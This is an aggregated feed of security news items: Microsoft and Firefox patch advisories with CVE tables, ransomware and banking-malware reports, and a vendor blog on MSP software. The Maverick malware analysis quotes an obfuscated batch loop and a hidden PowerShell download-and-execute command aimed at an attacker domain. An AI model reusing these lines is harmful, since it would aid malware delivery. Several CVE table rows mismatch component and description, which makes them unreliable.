• Microsoft has released its November 2025 Patch Tuesday update, addressing 63 security vulnerabilities across its software lineup. The update includes a critical fix for a zero-day vulnerability in the Windows Kernel that is confirmed to be actively exploited in the wild. The most critical patch in this month’s release is for CVE-2025-62215, an Elevation of […]

    The post Microsoft Patch Tuesday for November 2025 – Fix for 0-day and Other 62 Vulnerabilities appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Threat hunters have uncovered similarities between a banking malware called Coyote and a newly disclosed malicious program dubbed Maverick that has been propagated via WhatsApp. According to a report from CyberProof, both malware strains are written in .NET, target Brazilian users and banks, and feature identical functionality to decrypt, targeting banking URLs and monitor banking applications.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Microsoft rolled out its November 2025 Patch Tuesday security updates today, addressing 63 vulnerabilities across its product and service ecosystem.

    Among these, one zero-day flaw has already been exploited in the wild, underscoring the urgency for organizations and users to apply patches promptly to mitigate potential threats.

    The updates cover Windows, Office, Azure, Visual Studio, and other components, with a focus on remote code execution (RCE) and elevation of privilege (EoP) issues that could allow attackers to compromise systems.

    ImpactCount
    Elevation of Privilege29
    Remote Code Execution16
    Information Disclosure11
    Denial of Service3
    Spoofing2
    Security Feature Bypass2

    The key concern is CVE-2025-62215, a Windows Kernel Elevation of Privilege vulnerability rated as Important, with confirmed exploitation.

    This race condition flaw enables an authorized local attacker to escalate privileges by exploiting improper synchronization in shared resources.

    Microsoft notes that exploitation is more likely due to its active use, potentially allowing threat actors to gain higher access on affected Windows systems. No workaround exists beyond installing the update, and experts recommend immediate deployment on all supported versions, including Windows 10, 11, and Server editions.

    Critical vulnerabilities dominate the release, with five rated as such. Leading the pack is CVE-2025-62199, a use-after-free bug in Microsoft Office leading to RCE, where an unauthorized attacker could execute code locally via malicious documents.

    Exploitation is deemed less likely, but its critical severity warrants priority patching for Office users. Similarly, CVE-2025-60716 in Windows DirectX involves a use-after-free error, allowing local privilege escalation to critical levels.

    Another high-impact issue, CVE-2025-60724, is a heap-based buffer overflow in GDI+ that permits remote code execution over networks, posing risks to graphics-dependent applications.

    CVE-2025-62214 affects Visual Studio with command injection for local RCE, while CVE-2025-30398 in Nuance PowerScribe 360 exposes sensitive information via missing authorization, all released on November 11, 2025.

    The bulk of the patches, 57, rated Important target elevation of privilege flaws, which comprised over half the vulnerabilities. Notable examples include CVE-2025-59505 (double free in Windows Smart Card), CVE-2025-60704 (missing crypto in Kerberos for network-based EoP), and CVE-2025-60719 (untrusted pointer in WinSock driver).

    Information disclosure issues, like CVE-2025-59509 in Windows Speech Recognition, and denial-of-service bugs, such as CVE-2025-59510 in RRAS, round out the list.

    Azure components aren’t spared, with CVE-2025-59504 offering local RCE in the Monitor Agent via buffer overflow. Dynamics 365 sees spoofing via XSS in CVE-2025-62210 and CVE-2025-62211.

    CVE IDProduct/ComponentDescriptionImpact
    CVE-2025-62199Microsoft OfficeUse after free in Microsoft Office allows an unauthorized attacker to execute code locally.Remote Code Execution
    CVE-2025-60716DirectX Graphics KernelUse after free in Windows DirectX allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-60724GDI+Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.Remote Code Execution
    CVE-2025-62214Visual StudioImproper neutralization of special elements used in a command (‘command injection’) in Visual Studio allows an authorized attacker to execute code locally.Remote Code Execution
    CVE-2025-30398Nuance PowerScribe 360Missing authorization in Nuance PowerScribe allows an unauthorized attacker to disclose information over a network.Information Disclosure
    CVE-2025-59504Azure Monitor AgentHeap-based buffer overflow in Azure Monitor Agent allows an unauthorized attacker to execute code locally.Remote Code Execution
    CVE-2025-59505Windows Smart Card ReaderDouble free in Windows Smart Card allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-59506DirectX Graphics KernelConcurrent execution using shared resource with improper synchronization (‘race condition’) in Windows DirectX allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-59507Windows Speech RuntimeConcurrent execution using shared resource with improper synchronization (‘race condition’) in Windows Speech allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-59508Windows Speech RecognitionConcurrent execution using shared resource with improper synchronization (‘race condition’) in Windows Speech allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-59509Windows Speech RecognitionInsertion of sensitive information into sent data in Windows Speech allows an authorized attacker to disclose information locally.Information Disclosure
    CVE-2025-59510Windows Routing and Remote Access Service (RRAS)Improper link resolution before file access (‘link following’) in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to deny service locally.Denial of Service
    CVE-2025-59511Windows WLAN ServiceExternal control of file name or path in Windows WLAN Service allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-59512Customer Experience Improvement Program (CEIP)Improper access control in Customer Experience Improvement Program (CEIP) allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-59513Windows Bluetooth RFCOM Protocol DriverAn out-of-bounds read in the Windows Bluetooth RFCOMM Protocol Driver allows an authorized attacker to disclose local information.Information Disclosure
    CVE-2025-60703Windows Remote Desktop ServicesUntrusted pointer dereference in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-60704Windows KerberosMissing cryptographic step in Windows Kerberos allows an unauthorized attacker to elevate privileges over a network.Elevation of Privilege
    CVE-2025-60705Windows Client-Side CachingImproper access control in Windows Client-Side Caching (CSC) Service allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-60706Windows Hyper-VOut-of-bounds read in Windows Hyper-V allows an authorized attacker to disclose information locally.Information Disclosure
    CVE-2025-60707Multimedia Class Scheduler Service (MMCSS) DriverUse after free in Multimedia Class Scheduler Service (MMCSS) allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-60708Storvsp.sys DriverUntrusted pointer dereference in Storvsp.sys Driver allows an authorized attacker to deny service locally.Denial of Service
    CVE-2025-60709Windows Common Log File System DriverOut-of-bounds read in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-60710Host Process for Windows TasksImproper link resolution before file access (‘link following’) in Host Process for Windows Tasks allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-60726Microsoft ExcelOut-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.Information Disclosure
    CVE-2025-60727Microsoft ExcelOut-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.Remote Code Execution
    CVE-2025-60728Microsoft ExcelUntrusted pointer dereference in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.Information Disclosure
    CVE-2025-62206Microsoft Dynamics 365 (On-Premises)Exposure of sensitive information to an unauthorized actor in Microsoft Dynamics 365 (on-premises) allows an unauthorized attacker to disclose information over a network.Information Disclosure
    CVE-2025-62210Dynamics 365 Field Service (online)Improper neutralization of input during web page generation (‘cross-site scripting’) in Dynamics 365 Field Service (online) allows an authorized attacker to perform spoofing over a network.Spoofing
    CVE-2025-62216Microsoft OfficeUse-after-free in Windows Broadcast DVR User Service allows an authorized attacker to elevate privileges locally.Remote Code Execution
    CVE-2025-60719Windows Ancillary Function Driver for WinSockUntrusted pointer dereference in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-60722Microsoft OneDrive for AndroidImproper limitation of a pathname to a restricted directory (‘path traversal’) in OneDrive for Android allows an authorized attacker to elevate privileges over a network.Elevation of Privilege
    CVE-2025-62217Windows Ancillary Function Driver for WinSockConcurrent execution using shared resource with improper synchronization (‘race condition’) in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-62218Microsoft Wireless Provisioning SystemConcurrent execution using shared resource with improper synchronization (‘race condition’) in Microsoft Wireless Provisioning System allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-62219Microsoft Wireless Provisioning SystemDouble free in Microsoft Wireless Provisioning System allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-62220Windows Subsystem for Linux GUIHeap-based buffer overflow in Windows Subsystem for Linux GUI allows an unauthorized attacker to execute code over a network.Remote Code Execution
    CVE-2025-62452Windows Routing and Remote Access Service (RRAS)Heap-based buffer overflow in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to execute code over a network.Remote Code Execution
    CVE-2025-59240Microsoft ExcelExposure of sensitive information to an unauthorized actor in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.Information Disclosure
    CVE-2025-47179Configuration ManagerImproper access control in Microsoft Configuration Manager allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-59514Microsoft Streaming Service ProxyUse-after-free in Windows Broadcast DVR User Service allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-59515Windows Broadcast DVR User ServiceImproper privilege management in the Microsoft Streaming Service allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-60713Windows Routing and Remote Access Service (RRAS)Untrusted pointer dereference in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-60714Windows OLEHeap-based buffer overflow in Windows OLE allows an unauthorized attacker to execute code locally.Remote Code Execution
    CVE-2025-60715Windows Routing and Remote Access Service (RRAS)Heap-based buffer overflow in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to execute code over a network.Remote Code Execution
    CVE-2025-60717Windows Broadcast DVR User ServiceUse-after-free in Microsoft Office Word allows an unauthorized attacker to execute code locally.Elevation of Privilege
    CVE-2025-60718Windows Administrator ProtectionUntrusted search path in Windows Administrator Protection allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-60720Windows Transport Driver Interface (TDI) Translation DriverBuffer over-read in Windows TDX.sys allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-60723DirectX Graphics KernelConcurrent execution using shared resource with improper synchronization (‘race condition’) in Windows DirectX allows an authorized attacker to deny service over a network.Denial of Service
    CVE-2025-62200Microsoft ExcelUntrusted pointer dereference in Microsoft Office Excel allows an unauthorized attacker to execute code locally.Remote Code Execution
    CVE-2025-62201Microsoft ExcelHeap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.Remote Code Execution
    CVE-2025-62202Microsoft ExcelOut-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.Information Disclosure
    CVE-2025-62203Microsoft ExcelUse-after-free in Microsoft Office allows an unauthorized attacker to execute code locally.Remote Code Execution
    CVE-2025-62204Microsoft SharePointDeserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.Remote Code Execution
    CVE-2025-62205Microsoft OfficeAn out-of-bounds read in the Windows Bluetooth RFCOMM Protocol Driver allows an authorized attacker to disclose local information.Remote Code Execution
    CVE-2025-62208Windows License ManagerInsertion of sensitive information into log file in Windows License Manager allows an authorized attacker to disclose information locally.Information Disclosure
    CVE-2025-62209Windows License ManagerInsertion of sensitive information into log file in Windows License Manager allows an authorized attacker to disclose information locally.Information Disclosure
    CVE-2025-59499Microsoft SQL ServerImproper neutralization of special elements used in an sql command (‘sql injection’) in SQL Server allows an authorized attacker to elevate privileges over a network.Elevation of Privilege
    CVE-2025-62211Dynamics 365 Field Service (online)Improper neutralization of input during web page generation (‘cross-site scripting’) in Dynamics 365 Field Service (online) allows an authorized attacker to perform spoofing over a network.Spoofing
    CVE-2025-62215Windows KernelConcurrent execution using shared resource with improper synchronization (‘race condition’) in Windows Kernel allows an authorized attacker to elevate privileges locally. (Zero-day, exploited)Elevation of Privilege
    CVE-2025-62213Windows Ancillary Function Driver for WinSockUse-after-free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.Elevation of Privilege
    CVE-2025-62222Agentic AI and Visual Studio CodeImproper neutralization of special elements used in a command (‘command injection’) in Visual Studio Code CoPilot Chat Extension allows an unauthorized attacker to execute code over a network.Remote Code Execution
    CVE-2025-62449Microsoft Visual Studio Code CoPilot Chat ExtensionImproper limitation of a pathname to a restricted directory (‘path traversal’) in Visual Studio Code CoPilot Chat Extension allows an authorized attacker to bypass a security feature locally.Security Feature Bypass
    CVE-2025-60721Windows Administrator ProtectionPrivilege context switching error in Windows Administrator Protection allows an authorized attacker to elevate privileges locally.Elevation of Privilege
    CVE-2025-62453GitHub Copilot and Visual Studio CodeImproper validation of generative ai output in GitHub Copilot and Visual Studio Code allows an authorized attacker to bypass a security feature locally.Security Feature Bypass

    This Patch Tuesday reflects Microsoft’s ongoing efforts to bolster defenses amid rising threat landscapes, including APT campaigns targeting enterprise software.

    Affected products span client OS, servers, productivity tools, and cloud services, emphasizing the need for comprehensive patch management. Security teams should scan environments using tools like Microsoft Update or WSUS, prioritizing internet-facing and privileged systems.

    Vulnerability researchers highlight that while no additional zero-days were publicly disclosed, the exploited CVE-2025-62215 aligns with trends in kernel-level attacks.

    Other Patch Tuesday Vulnerabilities

    1. Firefox Releases Security Update to Fix Multiple Vulnerabilities Allowing Arbitrary Code Execution
    2. Ivanti Endpoint Manager Vulnerabilities Let Attackers Write Arbitrary Files to Disk
    3. Synology BeeStation 0-Day Vulnerability Let Remote Attackers Execute Arbitrary Code
    4. Zoom Vulnerabilities Let Attackers Bypass Access Controls to Access Session Data
    5. SAP Security Update – Patch for Critical Vulnerabilities Allowing Code Execution and Injection Attacks

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Microsoft November 2025 Patch Tuesday – 63 Vulnerabilities, Including 1 Zero-Day Fixed appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • To grow a successful MSP business, you need the right technology stack, but the real question is: how do you choose the right tools? While some solutions are well-known and widely used, others are less obvious yet equally important. 

    Read this blog post for an overview of what makes up an MSP’s technology stack, the problems these tools solve, and the most essential features for delivering best-in-class MSP services. 

    Key Pain Points MSPs Face Today 

    Although each managed service provider may have a very different setup and environment, there are some common problems almost every MSP business owner faces on a daily basis.

    Some of these challenges relate to day-to-day operations, others to the efficiency of service delivery, and some of them to struggles with customer satisfaction. 

    Managing Complex and Diverse Environments 

    When you’re growing and scaling your MSP business, you inevitably face customers with very diverse environments: some of them heavily rely on their on-prem infrastructure, while others lean towards becoming cloud-first only.

    Trying to juggle multiple solutions while satisfying the needs of these diverse customers is a true nightmare that cannot be solved without standardized and unified systems. 

    Manual Routines 

    Some MSPs still rely on on-site visits or spend hours on manual problem detection and remediation. However, these processes, if not automated properly, eat up the most precious thing any technician has – their time.

    And once efficiency decreases over time, customers may start looking for another provider with more time and resources. 

    Evolving Threat Landscape 

    Overall, the threat and cybersecurity landscape is extensive and constantly changing. There’s a wide range of vulnerabilities to cover, and their parameters are becoming increasingly fluid over time.

    Customers expect MSPs to guarantee complete data protection that won’t fail them, which, as you probably know, is no easy task.

    That’s why MSPs must stay up-to-date on cyber threats and ransomware, continually educate themselves and their customers, and, of course, follow market trends to choose the best tools for keeping every endpoint secure. 

    Scalability and Standardization 

    Once your MSP business takes off and you start getting more and more clients, it becomes increasingly difficult to address ever-growing problems individually.

    When this moment hits, you should start thinking about standardizing your software stack to avoid chaos in your operations and decreased service quality.

    However, some MSPs might face an even bigger issue here — the tools they’re used to no longer work well together when applied to a more diverse customer base, or they simply don’t have enough time and resources to properly manage multiple dashboards, bills, integrations – you name it. 

    Communication and Reporting 

    Without proper communication methods in place, it’s hard for MSPs to understand their clients’ needs, and without proper automated reporting, they struggle to demonstrate their value and prove that their customers’ budgets are well spent. 

    Best MSP Software: Essential Solutions Every MSP Needs 

    Again, although each MSP can combine the services they wish to offer as they need, there’s a specific range of services that can be the same for almost all providers.  

    Below, we provide the essential software every MSP should have, along with examples of the best MSP software on the market, and must-have features for each. 

    Backup and Disaster Recovery Solution 

    Owning a professional-grade backup and disaster recovery solution is a must for any managed service provider, since one of their primary tasks is protecting customer data from hardware crashes, human error, and other disruptions.

    Having a reliable and secure solution is essential, especially with the rise of ransomware and other destructive threats. Moreover, you also need to back up your own internal systems and data – that’s why this type of software should be number one on your list. 

    The most important features of a backup solution include the ability to back up files and systems, cloud backups (bonus points if the software allows you to back up your data to the cloud of your choice and doesn’t limit you to its own proprietary cloud), fast recovery, comprehensive reporting, alerting, and custom notifications.

    Another great feature to have is a centralized dashboard that you can access anytime to gain useful insights into all processes under your management. 

    Commonly used backup solutions for MSPs include: 

    • MSP360 Managed Backup: a centralized, cloud-based solution for desktops, servers and virtual machines, offering flexible storage options (AWS, Wasabi Hot Cloud Storage, Backblaze B2, or your own S3-compatible cloud). 
    • Acronis Cyber Protect: cyber resilient backup for physical, virtual, cloud, and mobile environments with natively integrated endpoint security.  

    Remote Monitoring and Management (RMM) 

    RMM tools are solutions designed to help MSPs track and manage their customers’ systems remotely. These tools significantly simplify MSPs’ work by eliminating the need for on-site presence for troubleshooting or patching. 

    Many RMM tools also offer automation features (such as patch management) to help you perform routine tasks as efficiently as possible.

    With capabilities like real-time monitoring, alerting, scripting, and task automation, your RMM tool will allow you to monitor system health across all endpoints under your management. 

    Here’s a list of the most popular RMM software options on the market: 

    • MSP360 RMM: MSP360 offers a completely free option for smaller MSPs with up to 50 endpoints under management (and the best part is that it’s not a trimmed-down version of a paid edition, it has the same features, with the only limitation being the number of endpoints), as well as a paid version for MSPs managing larger IT environments. 
    • NinjaOne: Comprehensive RMM solution with strong automation workflows and endpoint management. 
    • Atera: IT management platform that combines RMM, PSA and remote access with built-in AI agents. 

    Professional Services Automation (PSA) 

    PSA tools serve as a great addition to RMM solutions: together, these solutions streamline tasks such as client management, billing, and reporting.

    Key features that help MSPs enhance their internal workflow include ticket and time tracking, SLA management, billing integrations, and CRMs. 

    Popular PSA solutions among MSPs include: 

    • HaloPSA: All-in-one PSA with flexible workflow automation and a large variety of integrations. 
    • ConnectWise PSA: a solution for managing sales pipeline, invoicing, asset management, and more.  
    • Syncro: a tool that combines PSA and RMM in a unified solution. 
    • Autotask PSA: cloud-based PSA that centralizes operations like service desk, project management, and billing. 

    Remote Access Tools 

    While RMM solutions are useful for advanced remote monitoring and management tasks, remote desktop tools are essential when you need remote access for troubleshooting client systems.

    These tools eliminate the need for on-site visits for quick fixes, which, in turn, reduces the time required for issue remediation and significantly cuts travel costs. 

    The most advanced solutions on the market offer an extensive feature set, including secure, encrypted remote sessions, file transfer, unattended access, and support for Windows, macOS, and Linux. 

    The list of best MSP software for remote access includes: 

    • MSP360 Managed Connect: Secure remote access built for MSPs, with logging, encryption, and session reporting. 

    Documentation and Knowledge Management 

    Some businesses still struggle with slow, manual documentation management, and employees can spend hours digging through paperwork while searching for critical documents.

    To truly save resources and eliminate the risk of errors, it’s much easier to adopt professional MSP documentation software to keep all processes, policies, and procedures in order. 

    Regardless of the documentation software chosen, features like documentation templates, collaboration, integration with RMM and/or PSA tools, and structured categorization will help MSPs devote their valuable time to growing a profitable business instead of doing manual paperwork. 

    The most popular solutions are: 

    • IT Glue: Industry leader for MSP documentation and password management. 
    • Hudu: Affordable alternative with clean design and strong automation. 
    • Confluence: Flexible knowledge base for internal process documentation. 

    Conclusion 

    With the proper combination of all these solutions, MSPs can build a powerful and reliable software stack that addresses the most common IT challenges and issues, creating opportunities to exceed customers’ expectations and increase profitability.  

    The post Best MSP Software: The Essential Tech Stack  appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Mozilla has rolled out Firefox 145, addressing a series of high-severity vulnerabilities that could allow attackers to execute arbitrary code on users’ systems.

    Announced on November 11, 2025, the release patches flaws primarily in the browser’s graphics, JavaScript, and DOM components, urging immediate upgrades to mitigate risks from potential exploits.

    The update tackles 15 CVEs, with eight rated high impact, four moderate, and one low. A standout issue is CVE-2025-13027, a cluster of memory safety bugs discovered by Mozilla’s Fuzzing Team in Firefox 144 and Thunderbird 144.

    These flaws showed signs of memory corruption, and experts believe determined attackers could exploit them to achieve remote code execution, bypassing browser sandboxes and compromising entire devices.

    Such vulnerabilities often stem from buffer overflows or improper memory handling, making them prime targets for sophisticated malware campaigns.

    Firefox 145 – Security Update

    Graphics and WebGPU components bore the brunt of the fixes. CVE-2025-13021, CVE-2025-13022, and CVE-2025-13025 reported by Atte Kettunen and Oskar L, involve incorrect boundary conditions in WebGPU processing.

    These could trigger out-of-bounds reads or writes, potentially leading to crashes or code injection during the rendering of malicious web content.

    More alarmingly, CVE-2025-13023 and CVE-2025-13026 enable sandbox escapes, allowing restricted code to escape the sandbox and access sensitive system resources.

    Reporters Oskar L and Jamie Nicol highlighted how these bugs exploit WebGPU’s high-performance rendering, a feature increasingly targeted as web apps grow more graphics-intensive.

    JavaScript-related flaws add to the urgency. CVE-2025-13016, from Igor Morgenstern, fixes boundary errors in WebAssembly, while CVE-2025-13024, uncovered by Project KillFuzz of Qrious Secure, resolves JIT miscompilation that could optimize malicious code for execution.

    A race condition in the Graphics component (CVE-2025-13012, by Irvan Kurniawan) further risks timing-based attacks.

    Moderate-impact issues include same-origin policy bypasses in DOM components (CVEs-2025-13017, -13019) and mitigations in security and HTML parsing (CVEs-2025-13018, -13013).

    WebRTC vulnerabilities like use-after-free errors (CVEs-2025-13020, -13014) could expose audio/video streams, while a low-impact spoofing bug (CVE-2025-13015) affects UI integrity.

    CVE IDComponentDescription
    CVE-2025-13021Graphics: WebGPUIncorrect boundary conditions
    CVE-2025-13022Graphics: WebGPUIncorrect boundary conditions
    CVE-2025-13012GraphicsRace condition
    CVE-2025-13023Graphics: WebGPUSandbox escape due to incorrect boundary conditions
    CVE-2025-13016JavaScript: WebAssemblyIncorrect boundary conditions
    CVE-2025-13024JavaScript Engine: JITJIT miscompilation
    CVE-2025-13025Graphics: WebGPUIncorrect boundary conditions
    CVE-2025-13026Graphics: WebGPUSandbox escape due to incorrect boundary conditions
    CVE-2025-13017DOM: NotificationsSame-origin policy bypass
    CVE-2025-13018DOM: SecurityMitigation bypass
    CVE-2025-13019DOM: WorkersSame-origin policy bypass
    CVE-2025-13013DOM: Core & HTMLMitigation bypass
    CVE-2025-13020WebRTC: Audio/VideoUse-after-free
    CVE-2025-13014Audio/VideoUse-after-free
    CVE-2025-13015FirefoxSpoofing issue
    CVE-2025-13027Multiple (Memory safety)Memory safety bugs fixed in Firefox 145 and Thunderbird 145; evidence of memory corruption, potential for arbitrary code execution

    Mozilla emphasizes that no in-the-wild exploitation has been confirmed, but the high impact, especially the potential for arbitrary code execution, warrants swift action. Users on unpatched versions face elevated risks from drive-by downloads or phishing sites.

    The advisory also covers Thunderbird 145 for similar memory issues. To stay secure, download Firefox 145 from mozilla.org or enable auto-updates. Enterprises should scan for vulnerable instances and review WebGPU usage in custom apps.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Firefox Releases Security Update to Fix Multiple Vulnerabilities Allowing Arbitrary Code Execution appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Security researchers from CyberProof have discovered significant connections between two advanced banking trojans targeting Brazilian users and financial institutions.

    The Maverick banking malware, identified through suspicious file downloads via WhatsApp, shares remarkable similarities with the earlier reported Coyote malware campaign.

    Both threats employ sophisticated infection chains and demonstrate nearly identical behavioral patterns.

    The discovery emerged when CyberProof security analysts identified incidents involving malicious file downloads through WhatsApp.

    Investigation revealed these threats utilize .NET frameworks and deploy multi-stage infection beginning with link files spawning PowerShell commands.

    Both malware families target Brazilian banks, employ similar encryption to decrypt banking URLs, and demonstrate nearly identical monitoring routines.

    The attack begins when victims receive ZIP files through WhatsApp containing malicious LNK shortcut files. Upon execution, these deploy heavily obfuscated PowerShell commands designed to evade detection.

    CyberProof security researchers noted that malware constructs commands through complex FOR loops, splitting executable names and parameters into fragments to bypass monitoring.

    Malicious ZIP file downloaded from WhatsApp web (Source - CyberProof)
    Malicious ZIP file downloaded from WhatsApp web (Source – CyberProof)

    The infection demonstrates sophisticated evasion techniques. The malware employs Base64 and UTF-16LE encoding combined with string concatenation to reconstruct malicious PowerShell commands. One analyzed sample showed the following obfuscation pattern:-

    for %y in (pow) do for %c in (er) do for %V in (shel) 
    do for %q in (1.e) do for %A in (xe) do 
    %y%c%V%q%A → powershell.exe
    Variables and values assigned in the for loop (Source - CyberProof)
    Variables and values assigned in the for loop (Source – CyberProof)

    Once decoded, the PowerShell command contacts attacker-controlled infrastructure to download additional payloads.

    The decoded command establishes connections to malicious domains for further infection.

    powershell.exe -w hid -enc IEX (New-Object Net.WebClient).
    DownloadString('hxxps://zapgrande[.]com/api/itbi/BrDLwQ4tU70z')
    Working of for loop of the script (Source - CyberProof)
    Working of for loop of the script (Source – CyberProof)

    Persistence and Detection Evasion

    The malware establishes persistence by dropping batch files in the Windows startup folder using a naming pattern of HealthApp- followed by GUID and .bat extension.

    This creates outbound connections to command servers at domains like sorvetenopote[.]com and zapgrande[.]com.

    The Maverick agent performs extensive victim profiling before executing banking theft functionality.

    It checks Brazilian timezone settings, locale configurations, regional settings, and date formats. The malware terminates itself if criteria are not met, ensuring operation within intended geography.

    Both Maverick and Coyote employ AES encryption with GZIP compression in CBC mode to decrypt stored banking URLs from Base64 strings.

    This encryption similarity, combined with nearly identical banking monitoring code, strongly suggests shared development origins. The malware monitors browsers including Chrome, Firefox, Edge, Opera, and Brave for connections to over 50 Brazilian financial institutions.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Researchers Uncover the Strong Links Between Maverick and Coyote Banking Malwares appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Ivanti has released critical security updates for Ivanti Endpoint Manager to address three high-severity vulnerabilities that could allow authenticated attackers to write arbitrary files to any location on affected systems. The company disclosed the security advisory on November 10, 2025, with the latest patch becoming available immediately. CVE Number Description CVSS Score Severity CVE-2025-10918 Insecure […]

    The post Ivanti Endpoint Manager Vulnerabilities Let Attackers Write Files Anywhere on Target Systems appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The malware known as GootLoader has resurfaced yet again after a brief spike in activity earlier this March, according to new findings from Huntress. The cybersecurity company said it observed three GootLoader infections since October 27, 2025, out of which two resulted in hands-on keyboard intrusions with domain controller compromise taking place within 17 hours of initial infection. “

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • VanHelsing has emerged as a sophisticated ransomware-as-a-service operation that fundamentally changes the threat landscape for organizations worldwide.

    First observed on March 7, 2025, this multi-platform locker represents a significant escalation in ransomware deployment strategies by providing affiliates with a streamlined service model.

    The operation requires a $5,000 deposit from new affiliates and rewards them with 80 percent of all ransom payments, creating a scalable criminal enterprise that rapidly deploys attacks across diverse computing environments.

    Picus Security analysts identified that the ransomware targets not only traditional Windows systems but also extends its reach to Linux servers, BSD installations, ARM-based devices, and ESXi virtualization infrastructure, significantly broadening the scope of potential victims.

    The RaaS model’s aggressive market entry has already demonstrated tangible impact. Within two weeks of its launch, the group successfully compromised at least three known victims and initiated ransom negotiations, with one demand reportedly reaching $500,000.

    The operation’s only stated restriction prohibits targeting nations within the Commonwealth of Independent States, suggesting coordination between the threat actors and certain geopolitical interests.

    The sophistication of this approach lies in its operational flexibility, where affiliates receive a user-friendly control panel to orchestrate their campaigns independently while maintaining centralized infrastructure under the operators’ control.

    Picussecurity security analysts identified that the VanHelsing locker represents a tool under active and rapid development.

    The discovery of two variants compiled merely five days apart reveals continuous enhancement and refinement of the malware’s capabilities.

    This development velocity suggests the operators are responding to defensive measures and expanding functionality based on affiliate feedback and real-world deployment experiences.

    Mutation and Configuration Strategy

    The ransomware’s architecture reveals deliberate design choices that prioritize operational flexibility over stealth. Written in C++, VanHelsing employs an extensive command-line argument system that enables operators to customize attack behavior to specific target environments.

    Upon execution, the malware attempts to create a named mutex called “Global\VanHelsing” to prevent multiple instances from interfering with encryption processes, though this protection can be bypassed using the Force argument.

    The ransomware increases its process priority to receive preferential treatment from the operating system scheduler, accelerating encryption completion unless suppressed by the no-priority flag.

    The cryptographic implementation demonstrates security expertise. VanHelsing generates unique 32-byte keys and 12-byte nonces for each file, encrypting content with the ChaCha20 stream cipher.

    These ephemeral values are subsequently encrypted using an embedded Curve25519 public key hardcoded within the binary, ensuring only operators holding the private key can decrypt victim files.

    Additional command-line arguments like silent mode enable two-stage encryption without triggering security alerts, while spread-smb facilitates lateral movement across network shares.

    This technical sophistication combined with operational flexibility establishes VanHelsing as a formidable threat requiring comprehensive defensive strategies across all supported platforms.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post New VanHelsing Ransomware RaaS Model Attacking Windows, Linux, BSD, ARM, and ESXi Systems appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Ivanti has rolled out security updates for its Endpoint Manager product, addressing three high-severity vulnerabilities that could let authenticated local attackers write arbitrary files anywhere on the system disk.

    The flaws, if exploited, pose significant risks to enterprise environments by potentially allowing malicious code execution or data tampering.

